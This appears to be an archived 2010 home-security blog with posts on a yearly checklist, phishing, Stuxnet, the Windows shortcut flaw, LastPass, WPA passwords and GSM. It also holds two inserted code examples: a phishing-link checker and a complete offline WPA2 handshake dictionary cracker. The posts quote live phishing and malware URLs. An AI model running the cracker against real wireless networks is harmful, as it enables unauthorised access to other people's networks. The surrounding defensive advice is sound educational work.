Thursday, December 30, 2010

I Gotcher Security/Privacy Checklist for 2011 Right Here, Pal

Another year, another couple dollars, another couple or three or six hundred serious security flaws in Windows/MacOS X/*nix/Adobe Reader/Adobe Flash/Photoshop/Microsoft Office/Internet Explorer/Safari/Firefox/JavaScript/etc/etc that have been (and in many cases, still are) leveraged by the crooks to separate you from your money and personal/private information.

With the roller coaster ride known as 2010 winding down, I thought I'd summarize many of the things I've posted about thus far in a "yearly review" item - let's call it the 2011 12-Step Internet Security and Privacy Checklist:

1. STOP USING IE. Assuming you're a Windows user - surely you're not still using Internet Explorer as your default browser? (Mac-o-philes need not smirk here - I will predict that Safari will become more and more targeted by the criminal world; you have been warned.) I suggest Firefox + the NoScript plugin, or possibly Google Chrome + its NotScript plugin - although I have far less experience with Chrome so I can't unequivocally recommend it.

2. STAY UPDATED. No matter what your operating system is, make sure it's always got the latest updates. Windows can be configured to automatically download and install priority updates, or just download them and let you know that they're ready. I suggest at least the latter. The same goes for whatever browser(s) you use. (Chrome doesn't give you a choice - it updates itself transparently whenever a new version is published.)

3. FIX YER ACROBAT/READER SOFTWARE. If you use Adobe Acrobat or Adobe Reader to view .pdf files, update to the latest "X" version, and then immediately do this:
  • open Edit > Preferences
  • in the JavaScript part, turn off "Enable Acrobat JavaScript"
  • in the Trust Manager part, turn off "Allow opening of non-PDF file attachments with external applications"
If you're running version 9 and don't want to update to version X*, please still do the above steps.

Adobe continues to doggedly leave these things turned on by default in each new version of Acrobat and Reader, which is just plain irresponsible on their part.

* that link points at an installer that doesn't require you to first load the !@#$% Adobe Download Manager. Just say NO to ADM.

4. Another thing about Acrobat and Reader - there are alternatives. I have tried Foxit a couple of times but the rendering quality is noticeably poorer than what Adobe does. More recently I've started using the Google Docs Viewer for reading PDF files in Firefox (it works in all of the other browsers as far as I know).

5. WEAR PROTECTION. For Windows users - now that Microsoft has its free MS Security Essentials anti-malware software available, there is no excuse to not be running some kind of antivirus/antimalware protection. I will go further and say that I personally see no reason to pay anyone for this kind of functionality - e.g. Symantec, McAfee, etc. By all accounts MS does a very good job with MSSE.

6. CONNECT SECURELY. There is another nice utility plugin for Firefox called HTTPS Everywhere. If you do financial stuff on-line, you might've noticed that your browser's address bar will (hopefully) say something like "https://www.yourbank.com" when you're logged into the financial site... The "s" in "https" means "secure". Many other non-financial sites support the https protocol as well as the usual "http" protocol.

Here's what HTTPS Everywhere does for the sites it knows about that can support https connections: it will force you to connect with https rather than http. At the moment the list includes Facebook, Google Search, Twitter, Meebo, NY Times, Washington Post, bit.ly, Hotmail, Microsoft, Wikipedia, Wordpress.com, Google APIs, and quite a few others. When you are connected via https, whatever you send and receive can't be read or tampered with by anyone listening in (they can still see which site you're talking to, just not what you're saying to it), which is very nice if you're connected to the 'net using an open wifi hotspot that does not provide a Virtual Private Network connection to the Internet. In general you always want "https" if it's available, no matter what you're doing.

7. BE SELFISH. Turn off any unnecessary "network shares" on all of your computers.

8. USE PASSWORDS. Make sure every machine on your network is login password-protected.

9. MASSAGE YOUR ROUTER. Make sure your router (or modem/router - i.e. the box that you got from your cable or phone company that hooks you up to the internet) is properly configured.

Typically the router configuration is accessed through a mini-web server that is built into the router - and typically it will have an address of something like 192.168.1.1.

In that particular case, you can go to your browser and type in "http://192.168.1.1" and the web interface will show up. (Other addresses are possible; consult the router or router/modem manual for more details about your particular box.) Here are some things to keep in mind:
  • Change the default administrative password for the router. E.g. for Linksys routers, all of the ones I've used have a default password of "admin". If you don't do anything else, do this.
  • Make sure that you're using at least WPA encryption if your router has wi-fi capability. WPA2 is better, WEP is sorta kinda better than nothing, but not much. IMO the wireless interface of a router is its weakest link in terms of people getting onto your network and possibly stealing private (e.g. financial) information from other computers connected to your network.
  • turn off anything that says "Plug and Play" (UPnP). It lets any program on any computer on your network open holes in the router's firewall without asking you, which is exactly what malware wants.
  • Make sure the NAT firewall is enabled. It might just say "Firewall".
  • Don't have any more ports (holes) opened in your firewall than absolutely necessary. If you open one or more up and then stop using whatever program needs them open, close them.

10. USE "LASTPASS". I continue to love this free, secure, backed-up-in-the-cloud password and private data manager product. I won't go into it here since I already did that not too long ago.


11. BACK UP YER STUFF. This is a huge topic, and I won't go into detail, but - do you have at least two, recent backup copies of all of the stuff on your computer(s)/mobile devices that you can't live without? E.g. photos, financial data files, the latest version of the Great Novel that you're working on, critical account information for on-line resources that you use (LastPass can help here), address book/contact database, etc. I say two backups because many people would tell you that if you only have one copy "somewhere", you're not really backed up. You need to have two copies of all of the important stuff, ideally on different kinds of media (DVD-R, CD-R, CD-RW, USB memory stick, cloud backup....), and certainly not in the same location - i.e. carry one of the copies in your car or keep one at your mom's house or something.

12. DONT EVER CLICK ON A LINK IN AN EMAIL. E.g. if you get a notice that seems to be from Microsoft or Adobe or whoever (whomever?) that you need to update something, don't click on the link that is provided. Instead, navigate to the vendor's website in your browser and find the update - if it actually exists - yourself. You might even try googling it - e.g. "acrobat x update".

OK, that's your twelve steps. I'm sure I left something important out - there are so many things to worry about when you're toodling around the World Wide Web - but any and all of these things will help at least a little bit in keeping you and yours safer in the new year to come.

Tuesday, November 23, 2010

Firefox Saves the Day

I just got to see a new feature in Firefox 3 at work, and it's pretty cool.

I had an email in my GMail spam folder that looked like this:


Looks pretty legit, right? The link text appears OK. However, the actual link looks something like (part of the URL intentionally deleted):

http://smtp.cremadescalvosotelo.com/bankofamerica=JSPR53/e-online-banking...

So obviously it's at best a personal information phishing site. Well, I decided to see where that would take me, so I clicked on it. However, Firefox saved me from myself:


Clicking on the "Why was this page blocked?" button shows this:

I tried this in Internet Explorer and I'm happy (and a bit surprised) to report that it gave a similar "you really don't want to go there" message.

However, even though our browsers sometimes try to protect us from ourselves, links in emails should never be clicked on. If you get a message from your bank that wants you to log in for whatever reason, go to your browser and type in the URL that you know to be the correct one for your bank (if you don't have it bookmarked) rather than click on anything in an email.
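The Bank of America link above (and item 12 of the checklist, never click a link in an email) come down to one question: what hostname does the link really go to? Here is an added example, not from the original post and not Firefox's own phishing filter, that pulls the real hostname out of a link and flags a brand name that shows up somewhere other than the registered domain. The "registered domain" is approximated as the last two DNS labels, which is a stated simplification (a real tool would consult the Public Suffix List); the sample links are the one from the post with the elided tail left off, the bank's real site, and two constructed variants.

```python
"""Added example (not from the original post): where does a link really go?

Phishing links keep the real hostname boring and put the brand name where
your eye lands: a subdomain, the path, or the query string. Only the
registered domain decides who receives the request, so that is what we check.
Simplification: the registered domain is taken as the last two DNS labels
(a real tool would consult the Public Suffix List so that e.g. "bank.co.uk"
is handled correctly)."""
from urllib.parse import urlsplit


def registered_domain(host: str) -> str:
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def inspect_link(url: str, brand: str) -> dict:
    """Report the real host and whether `brand` shows up outside the registered domain."""
    if "://" not in url:            # a bare "www.example.com/..." link
        url = "http://" + url
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reg = registered_domain(host)
    brand = brand.lower()
    brand_in_registered = brand in reg
    brand_elsewhere = (brand in host or brand in parts.path.lower()
                       or brand in parts.query.lower())
    return {
        "host": host,
        "registered_domain": reg,
        "suspicious": brand_elsewhere and not brand_in_registered,
    }


# The link from the post (with the tail the author elided left off), the real
# bank site, and two constructed variants of the same trick.
SAMPLE_LINKS = {
    "from the post": "http://smtp.cremadescalvosotelo.com/bankofamerica=JSPR53/e-online-banking",
    "brand in subdomain (constructed)": "http://bankofamerica.login.example.net/",
    "brand in query (constructed)": "www.example.org/go?site=bankofamerica",
    "the legitimate site": "https://www.bankofamerica.com/online-banking/",
}


def report(brand: str = "bankofamerica") -> dict:
    """Run inspect_link over the samples; returns {label: suspicious?}."""
    return {label: inspect_link(url, brand)["suspicious"]
            for label, url in SAMPLE_LINKS.items()}


if __name__ == "__main__":
    for label, url in SAMPLE_LINKS.items():
        print(f"{label:35s} {inspect_link(url, 'bankofamerica')}")
```

This is one heuristic, not a verdict: a link that never mentions the brand at all sails through it, which is exactly why the post's rule of typing the bank's address yourself is the real defence.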

Friday, November 19, 2010

Stuxnet Worm - still in the news

I have posted three times about the Microsoft Windows "Shortcut (LNK)" vulnerability since July. A lot has transpired since then; it's been found to be one of six security issues in Windows that are leveraged by the Stuxnet worm (some of which were previously unknown in the security community).

Stuxnet is in the press right now as being one of the most serious security threats ever unleashed, and is said to be a sort of "new animal" in cyber-warfare. I'll provide some links for further reading below, but the apparent intent and sophisticated behavior of Stuxnet is so, well, awesome (in a bad way) that I do want to summarize what's been learned:
  • Its targeted behavior is very specific - although it propagates via Windows (using USB memory sticks and/or network connections), its ultimate target is a particular brand of industrial controller made by Siemens, which is network-connected to those Windows systems
  • Not only is it Siemens "SCADA"-system specific, but its end targets are "variable-frequency drives" made by two specific companies, that regulate the speed and operation of electric motors
  • Only motors that are programmed to run within a specific speed band are targeted
  • The speed band corresponds to speeds used by uranium refinement centrifuges
  • The end result is that Stuxnet causes those motors to periodically overspeed and underspeed

It's still not known who wrote Stuxnet, but there is universal agreement that its sophistication and complexity are unprecedented, and that it is unfortunately probably the first shot fired in a new level of cyber-warfare.

As promised, here are some links if you want to dig deeper:

I promise we have not heard the end of this "worm".

"Shall we play a game?"

Thursday, October 28, 2010

WPA Wireless Password Cracking For Fun & Profit

Many of my friends and family have heard or read my whinings about how using WEP encryption for your wireless network is a short hair away from "extremely stupid", and that you should really be using WPA (or better, WPA2). Well, I am hoping that the message has gotten through to most folks, although I must say that when I do a site survey around my neighborhood even now, I still see the occasional WEP-"protected" hotspot pop up.

But you, being smarter than the average bear, are now sitting behind a WPA-protected router at home or in your office - life is good! Welllll... maybe not. What kind of passkey did you lock it down with? Please tell me it's not your dog's name, or maybe favorite gourmet dish, or your Mom's maiden name... Is it?

The reason why I ask is this: there is at least one company out there that offers a WPA password-cracking service, for $17 a crack. Apparently it takes 40 minutes or less if your password is in their 135-million-word "dictionary".



All that's required is to provide them with a "sniff" file of a wireless network that is to be infiltrated - specifically, a capture that includes the WPA "four-way handshake" that a computer and the router exchange when the computer joins the network; that handshake is what each dictionary word gets tested against. This sniff (.pcap) file can be easily created using a laptop with a wireless card and open-source software such as aircrack-ng (even I've done it, purely in the interest of research and learning of course - and I did it using my own wireless router as the target).

Now you may be saying, "but Igor, who is going to go to the trouble of trying to hack into my network?" That's a good question, but IMO the wireless part of any network is potentially its weakest link, so why not lock it down as best you can so you don't have to worry about it?

That means you need a decent password. I won't say "excellent" or even "very good" password - you probably don't want to use the kind of gobbledegookeley password that LastPass can generate, because you might want to give some (highly) trusted person access to your wireless network. So you want a password that can be verbally relayed to someone without too much difficulty.

Remember that the kind of WPA cracking we're talking about depends on a dictionary. Even a dictionary that has 135 million words in it is not going to have bizarre combinations of words and letters (let alone punctuation marks). So how could you create a Bizarre Combination? One suggestion is to use some kind of easily rememberable number followed by a string of easily rememberable words - yet numbers and words that are not blatantly obvious to everyone that knows you. I'll throw this out:

the first address number you lived at that you remember +

high school name +

favorite gradeschool teacher

So in my case (and no I don't use this password anywhere) it would be

648ravenswoodhackworth

Now that's a pretty good password. Throwing in some punctuation and capitalization, e.g.

648.Ravenswood.Hackworth

makes it far less likely that any dictionary has that particular sequence in it. (One caveat: cracking tools can also apply "rules" to each dictionary entry - tacking on digits, trying punctuation between words - so the real protection here is the length and the fact that the pieces aren't words anyone would guess for you.) Easy Cheesy! And pretty easy to remember as well.

Heck, write it down on a piece of paper and put it in your desk drawer - if the miscreant who's trying to break into your network has physical access to your desk drawer, you have far bigger problems that I'll attempt to address here!
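The cracking service described above and the passphrase advice that follows come down to one computation, so here is an added example - not from the original post, and not the service's or aircrack-ng's code - that runs the whole check the way a cracker does: derive the key from a candidate passphrase and the network name, expand it, recompute the handshake's integrity check and compare. The SSID, the two MAC addresses, the EAPOL frame body and the wordlist are all constructed for the example, and the client side of the handshake is simulated so that it runs offline; the "IEEE"/"password" check in the test is the published 802.11i test vector.

```python
"""Added example, not code from the original post: an offline dictionary
attack against a captured WPA2 four-way handshake, start to finish.

From the .pcap the cracker needs five things: the router's MAC (AA), the
client's MAC (SPA), the two nonces (ANonce, SNonce) and the MIC on one
EAPOL-Key frame. For every candidate passphrase it then:
  1. derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)
  2. expands PMK into the PTK with the 802.11i PRF ("Pairwise key expansion")
  3. recomputes the MIC with the first 16 bytes of the PTK (the KCK); a match
     means the guess is the real passphrase.
Step 3 is HMAC-SHA1 truncated to 16 bytes for WPA2/CCMP (WPA1/TKIP uses
HMAC-MD5). The SSID, MACs, EAPOL frame body and wordlist below are all
constructed for the example; the client side of the handshake is simulated
so that the whole thing runs offline."""
import hashlib
import hmac
import os


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Step 1: the 4096-round PBKDF2 is what makes each guess cost something."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Step 2: PRF-384 from 802.11i; PTK = KCK(16) | KEK(16) | TK(16) for CCMP."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):  # 3 x 20 bytes covers the 48 we need
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:48]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Step 3: WPA2 MIC = HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), cut to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def capture_handshake(passphrase: str, ssid: str, aa: bytes, spa: bytes) -> dict:
    """Simulate what aircrack-ng would pull out of a .pcap of a client joining the network."""
    anonce, snonce = os.urandom(32), os.urandom(32)
    ptk = wpa_ptk(wpa_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    # Constructed stand-in for message 2 of the handshake with its MIC field zeroed;
    # a real tool copies these bytes straight out of the capture.
    eapol = b"\x01\x03\x00\x75\x02\x01\x0a" + b"\x00" * 8 + snonce + b"\x00" * 40
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": eapol_mic(ptk[:16], eapol)}


def dictionary_attack(hs: dict, wordlist):
    """Return the passphrase that reproduces the captured MIC, or None if it's not in the list."""
    for candidate in wordlist:
        ptk = wpa_ptk(wpa_pmk(candidate, hs["ssid"]), hs["aa"], hs["spa"],
                      hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), hs["mic"]):
            return candidate
    return None


# Constructed: a tiny wordlist of the sort of entries a 135-million-word list is full of.
WORDLIST = ["password", "letmein", "lasagna", "fido", "ravenswood", "hackworth",
            "648ravenswood", "Ravenswood1"]
SSID = "HomeNet"                              # constructed
ROUTER_MAC = bytes.fromhex("00259c000001")    # constructed
LAPTOP_MAC = bytes.fromhex("001e52000002")    # constructed


def demo():
    """Two networks, same SSID: one keyed with the dog's name, one in the post's style."""
    weak = capture_handshake("fido", SSID, ROUTER_MAC, LAPTOP_MAC)
    strong = capture_handshake("648.Ravenswood.Hackworth", SSID, ROUTER_MAC, LAPTOP_MAC)
    return dictionary_attack(weak, WORDLIST), dictionary_attack(strong, WORDLIST)


if __name__ == "__main__":
    found_weak, found_strong = demo()
    print("dog's-name network:", found_weak)                 # fido
    print("648.Ravenswood.Hackworth network:", found_strong)  # None
```

Two things worth noticing in the code. The SSID is the salt for step 1, so a network still called "linksys" or "default" can be attacked with tables that were computed once and reused; giving your network an unusual name costs nothing and kills that shortcut. And every guess costs 4096 rounds of HMAC-SHA1 twice over, which is exactly why the service sells time on a cluster rather than a laptop - and why a passphrase that is not in the list at all is the only thing that actually ends the conversation.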

Friday, September 3, 2010

Escaping Password Hell with "LastPass"

There are two or three people out there who recognize the importance of using robust passwords for important on-line resources like banks and PayPal and eBay and such (as well as using different passwords for each site). Most everyone else uses their dog's or first born child's name for every single thing they have to log into on the net... Because it's really hard to remember passwords that are robust, such as E5A@/6Z(aKj&^]RO+V. So in the end most people don't even try.

Admittedly, I was somewhat lax about robust passwords too, until recently - I had one password that I used for casual sites, and a much longer one that involved a combination of numbers and characters for my financial sites. But still, I used that one password at a lot of different places.

Via episode #256 of the Security Now podcast, I've become aware of the free LastPass product, and am now using it for all of my password needs. Here, I'll try to summarize what it does and hopefully how easy it is to use, in the hopes that you'll take the time to start using it too.

Firstly - before we continue - here's what LastPass supports: Windows, Mac OS X, Linux, Firefox, Safari, Chrome, and even Internet Explorer 8^) . So most people will be able to use this cool utility.

OK - onwards... The thing I like most about LastPass (which I'll call "LP" from here on out) is that all of my passwords are stored in encrypted form "in the cloud". This lets me access them from any browser that I have the LP plugin installed on, so I can be anywhere in the world. Since the encryption is done "locally" - i.e. on my computer rather than by the LP site, they are extremely well protected. Not even the LP people have any way of getting my passwords unless I tell them my Master Password. When I need to use a password, LP goes up to my cloud-stored Password Vault, grabs the encrypted password, sucks it down the Internet Pipes, decrypts it, and fills in the password field on a web page.

But - there is a caveat: you will need to have one robust Master Password - it's the "key to the kingdom" of all of the rest of your passwords. It really needs to be "strong" and you really really need to be able to remember it. And - your dog's name or mother's maiden name ain't gonna cut it. (A place to start is - combine the home phone number that you had when you were a kid with the names of your three best friends in high school - e.g. 3042732273JamesFredHomer is a pretty good password.)

Once LP is installed (it automatically installed into both Firefox and IE for me) you can get started. I was able to import all of my passwords from the previous password vault utility that I used (Roboform ToGo), which was nice (it can also import from IE's and Firefox's password caches, as well as a bunch of other password products). Once that was done, I could go to my Password Vault in my browser:

From there I can combine my passwords into Groups (e.g. "Shopping", "Travel", etc.), edit them, delete them, and even Share them (securely) with another LP user. Also, just by clicking on a site name, it will bring that site up and fill in your credentials. For new sites, LP will offer to remember the username and password for each one.

But what I did right after installation is use LastPass's built-in password generator to create new passwords for all of the financial sites that I use. Since different sites have different requirements for passwords - and on the flip side, limitations to what characters/numbers/etc. they can understand - the LastPass generator can be easily configured:

Every time "Generate" is pressed, it will generate a fresh password based on what you have setup for length and contents... The green bar gives you an idea of how secure each new password is.

LP can guide you through the process of replacing your old, crummy, too-short passwords that you've used for the last ten years with much more secure ones that it generates. And the beauty is that you don't have to remember any of them - when you next visit any of the sites that are stored in LP, it will automatically fill in the username and password fields (and it can even press the "login" button for you if you want).

One other significant feature is that LP can fill out most web pages that want your name, phone number, credit card, credit card expiration date, credit card CVV number, ship-to address, bill-to address, etc. You can enter that stuff into LP once; from that point on it will fill in all of those fields for you. And, like the contents of the Password Vault, all of that information is encrypted and safe.



So I mentioned at the outset that LP is free, and everything that I've described (and quite a bit more that I won't go into, lest this become even more of a novel-length post) is free. There are, however, some additional features that are only in the Premium version. One of them is the ability to download and install the LP applet for the iPhone/iPad/iPod Touch, BlackBerry, Android, and Windows Mobile devices so that you can always keep your entire Vault with you. Several other Premium features are there too, as described here. Now comes the bad news - it's gonna cost you... drum roll please... a buck a month. Howsa! I'm trying to think of something else that costs a buck a month... Nope, can't.

But if you don't need any of the Premium stuff, all you have to lose by trying LastPass is the time it takes to install it and learn it, and I encourage you to give it a shot.

Finally: a friend of ours was recently "hacked" on-line and was conned out of a few hundred dollars. She was pretty freaked out about it... I asked her what kind of password she was using. You guessed it, the names of her dogs. I told her about LastPass and was going to help her get it installed and running, but she was able to get it going on her own without any assistance (other than my suggesting ways to create an easy-to-remember Master Password). So I think that's a good testimonial that it's pretty straightforward to use.

Tuesday, August 3, 2010

Microsoft releases "out of cycle" patch for Shortcut Flaw

Hopefully you've already heard about this because you're Paying Attention, but just in case you haven't: Microsoft released a fix yesterday (Monday) for the shortcut/LNK vulnerability that has been in the news over the past couple of weeks. I strongly recommend that you get your Windows system(s) patched with this fix. I have patched my WinXP and Win7 systems with no issues, and have subsequently removed the workarounds that I had in place.

Go to MS's Security Bulletin MS10-046 and select your version of Windows from the table there; that will take you to a download/instruction page - or alternatively, run Windows Update, which should get it for you automatically. You will probably have to reboot your system afterwards (I had to for both XP and Win7).

Update: Microsoft has released a fairly technical Q&A for this fix - good reading for those that want to dig into the details.

Thursday, July 29, 2010

Check Writing Robots Attack Earth

The annual Black Hat conference is underway in Las Vegas... This is "the" event where security researchers try to out-do one another in discovering and exploiting security flaws... One of the more interesting ones this time around involves hacking ATMs, but what I wanted to share is a diagram that shows the complexity and ingenuity of a check-forging scheme that originates in Mother Russia:
For the full story go check out the CNET article... It continues to amaze me how quickly the sophistication of cyber-criminals is increasing!

Friday, July 23, 2010

Update on MS Shortcut Flaw

Details and corrections about how this vulnerability works and the seriousness of it continue to come out in the infosec world. Episode 258 of the Security Now! podcast lays it out pretty well. Some key points:
  • Microsoft has updated their Security Advisory at least twice this week; it now points to a Knowledge Base article that has a "Fix it" thing you can click on to make the two changes I described in the last post about this. They have also substantially revised their analysis of the flaw - originally it was thought that the AutoPlay/Autorun feature had to be turned on but as we know now, just viewing a shortcut in Windows Explorer can trigger malware if it exists.
  • It is apparently possible that even shortcuts embedded in documents (e.g. MS Word files), emails, or web pages could be used as vectors... Think about that for moment - yow!
  • The SN podcast also points to a Didier Stevens blog post that describes how to use Software Restriction Policies in Windows to combat the flaw. However, it's probably a more advanced "hack" than the ones already described, and you can really screw stuff up if you don't know what you're doing with Policies. I have managed to configure two systems I have (one XP, one Win7) successfully with these changes, and tested it on one of them by trying to run an executable on a thumb drive that I have mounted... The application is blocked and a message comes up saying so.
The big question is how and when Microsoft will fix this. But - no matter what they do - older versions of Windows (e.g. Windows 2000 and XP SP2) are no longer being updated by MS with patches, so unless they make an exception for this very serious flaw, some systems will never be safe from this (unless a 3rd party makes some kind of widget available that blocks it).

Friday 7/30 update: MS has announced that they're going to release an out-of-cycle patch next week for this. Details are in the MS Security blog.

Monday, July 19, 2010

New Windows vulnerability discovered - be careful with those USB sticks!

Microsoft posted information late last week about a vulnerability in Windows that can mean that merely plugging a USB memory stick into your PC can cause bad things to happen. Basically, a shortcut (.lnk) file can be crafted so that when Windows Explorer goes to draw the little picture (icon) for it, Windows loads and runs code that the attackers put on the stick alongside the shortcut - no double-click required. At that point your system is pwnd 8^) and they can do whatever they want to it.

At the moment there is no fix and the workarounds are fairly technical. More information and details can be found at The H Security page as well as Microsoft's Security Advisory about it. So until MS releases a patch, be extremely careful about loading USB memory sticks onto your PC or laptop - know where they came from. Don't take candy or USB drives from strangers!

7/19 update: SANS has raised its Infocon alert level to Yellow because of the shortcut bug.

7/20 update: This flaw has gotten more press than anything I remember seeing since the Conficker worm, which happened shortly after I started this blog. Furthermore, more than one industry expert is saying that this flaw is not easily fixable... I've been doing some more research on it, and despite first deciding that I would not make any modifications to my machines to protect against it, just a while ago I changed my mind and made the two mods recommended by Microsoft to my Windows 7 work laptop. One of the mods is to delete a Windows registry key (after making a backup of it), which will suppress the display of icons on shortcuts in Windows Explorer (thus precluding running malicious code that might be embedded in the icon file).


The other is to disable (and stop, if it's already running) a Windows "service" called WebClient, using the services.msc application. (WebClient is Windows' WebDAV client - it lets Windows treat a web server as if it were a file share, which also means a booby-trapped shortcut could be served up to your PC from a web server rather than a thumb drive. In all likelihood you do not need it running.)

As I said before these mods are not the sort of thing that most people do often or even at all with their Windows installations, but if you follow the instructions carefully in the Microsoft Security Advisory, you should be fine. As long as you make the backup of the registry key as described in that document, both actions are reversible, and I therefore recommend doing them.

Monday, June 21, 2010

Urgent - possible Craigslist malware alert

I just came across something that looks very questionable, and am sufficiently alarmed about it that I am making this post without doing my normal research first. I have not heard about this particular malware distribution approach before, and I very nearly did a bad bad thing just a few minutes ago (i.e. allowing an unknown executable to download and run).

The story: I posted a number of things on Craigslist today, two of which were guitar amplifiers. I received two responses within minutes of each other, on those amps, from two completely different email addresses - one being a Hotmail account, and the other a Live account. Both have the exact same message body:
"Will you trade for this?"
In each email, that "question" was followed by a URL (which I am not publishing for obvious reasons). I clicked on the links, which have the form "www.hostsimages.info/" (followed by alphanumeric values), and both took me to the same final URL, which looks like this:


It's hard to see in the image, but the page looks like it has some images that it wants to load, but can't for some reason. Also, Firefox has posted a message in the yellow banner bar that says:

This website needs to install the following add-on: 'Flash Image Loader' from 'AdobeFlash'. Please download the Flash Image Loader by clicking here...

Now, I've never heard of "Flash Image Loader" but it sounds legitimate enough - what I didn't notice until later is that it is supposedly sourced by a company called "AdobeFlash". Hmmmm. Fortunately before clicking on the yellow bar, which would've downloaded a file, I looked at Firefox's status bar while hovering my mouse cursor over that message, and the actual download URL shown is "images201.com/imagex.exe". I have no idea what that executable is, but it sure isn't from Adobe and could literally be anything. (Googling "imagex.exe" comes up with a few things, but none of them have anything to do with Flash or Adobe.)

In sum, what seems to be happening here is that some people up to no good are (either manually, or more probably by using automation) monitoring Craigslist postings, and responding with an email that has been cleverly constructed to lead people to a malicious site that downloads an executable on their machines.

So - I think I dodged a bullet here. What is quite ironic is that on a recent episode of my favorite security podcast Security Now, Steve Gibson declared that he never ever clicks on links that he gets via email. I remember chuckling to myself when I heard that, because I do it all the time and haven't had anything bad happen - hey, I'm a smart guy that sees this stuff coming! Well, I learned a lesson today for sure.

Finally: speaking of "Security Now", Steve has a post up on his blog about a recently discovered Adobe Flash exploit that everyone - yes even you Mac types (and Linux types...) needs to know about and take the appropriate steps for. Acrobat and (Acrobat) Reader are also affected, and the bad guys are already taking advantage of it. You can read about that here.



Wednesday, January 20, 2010

Do you have a spare $447,000 laying around?

Today's topic is not new news - the incident happened last July - but I've thought about it many times since hearing about it. This makes me ever more paranoid about doing any financial transactions online... I still do them just because it's so dang convenient, but I wonder how long the model that's in place (authenticated "secure" browser sessions) can continue to work.

Full details can be found in a Technology Review article, but the gist of this is that a construction company in Mountain View, California was liberated of $447K from its commercial bank account, while one of its employees was signed in to it.

You might think "oh someone got his password" - but the company had implemented what everyone thought was the Safe And Secure thing to do: the account was set up to not only require a normal password, but also a second, "one time" password that is generated by a small electronic device or card that the person logging in has to have in his or her physical possession (I have one that I use with my PayPal account).

Unfortunately, his system had been infected with a malware program that basically waited for him to sign into the commercial account and then, while he was signed in, performed transactions in the background to withdraw and transfer the loot to several Bad Guy Accounts. The one-time password device didn't help because the crooks never needed his password - they rode along on the session he had already opened.

So - what to do? I'm going to sound like one of those magical round plastic disc things that everyone used to have, that had music on them (I think they were called "phonograph records") - I've said most of this before... But I feel reasonably secure in doing these things on my systems:
  • keeping antivirus software updated (I'm now using Microsoft's new and free Security Essentials on almost all of my PCs)
  • making sure the web browser is up-to-date
  • disabling scripting (JavaScript and ActiveX) in the browser. I use NoScript in Firefox, which lets me selectively enable or disable scripts on a per-site basis
  • keeping browser plugins and standalone programs such as Adobe Acrobat and Flash updated
  • using a one-time password device on all financial accounts that support it, in order to have the magic that's called Dual Factor Authentication. Paypal and eBay, as well as many other banks/institutions support these, and sometimes a device that is obtained from one place can be used elsewhere - for instance, the Verisign device that I got from PayPal is supported by my credit union
I'll close by saying that I think some of my friends roll their eyes when I start yammering about these things - all I'll say is, "don't come cryin' to me when something very bad happens because you weren't taking precautions."

Hmmm, I think my Dad told me that, a long time ago.


Friday, January 1, 2010

GSM Phone Security - Not So Secure Anymore

Happy new year to everyone! Really. I would like to think it will be better than that last one!

This has been in the press recently: although it's not trivial to do - a snoop needs about $1000 worth of equipment to accomplish it - the encryption scheme that "GSM" digital cell phones use (the A5/1 cipher) has been cracked. This means if you're an AT&T (don't get me started about that company!) or T-Mobile subscriber in the US, your calls can no longer be considered to be private. (Verizon, Sprint, etc. use CDMA technology, which is totally different from GSM.)

The researcher who published the technique is being lambasted quite a bit for doing it, but I believe his intentions are noble - as is so often the case in big business, companies are loath to do anything that costs them money and prefer to ignore Elephants In The Living Room until they're forced to do something.

Now, another blogger asserts that there's nothing to worry about, and that the phone companies will move to the stronger 128-bit encryption protocol (the current protocol is "only" 64 bit) - but it could be said that the publication of the decryption technique will at least hurry them along a bit, and even with that, who knows when this will actually be 100% deployed across the country?

***

While we're on the subject - the cordless landline phones I use in my home are Panasonic "DECT 6.0" phones - I got them at Costco, but DECT 6.0 phones are sold "everywhere". In theory my phones provide secured communications that can't be monitored, but I have seen mention here and there that some phone manufacturers don't enable the encryption that DECT provides. So when I order a pizza (mmmmm, Fast Pizza Delivery pizza!) over the phone and give them my credit card information, I really have no idea whether that conversation could be monitored by some crook with a sophisticated radio receiver (e.g. GNU Radio).

So for the moment, since I'm stuck with AT&T Wireless for the time being, and because I use DECT 6.0 phones at home, I have no assurance that my conversations are secure. You might say "well who cares - I have nothing to hide!" - well, how many times do you use your cell or home wireless phone to perform financial transactions with your bank, broker, credit card company,...?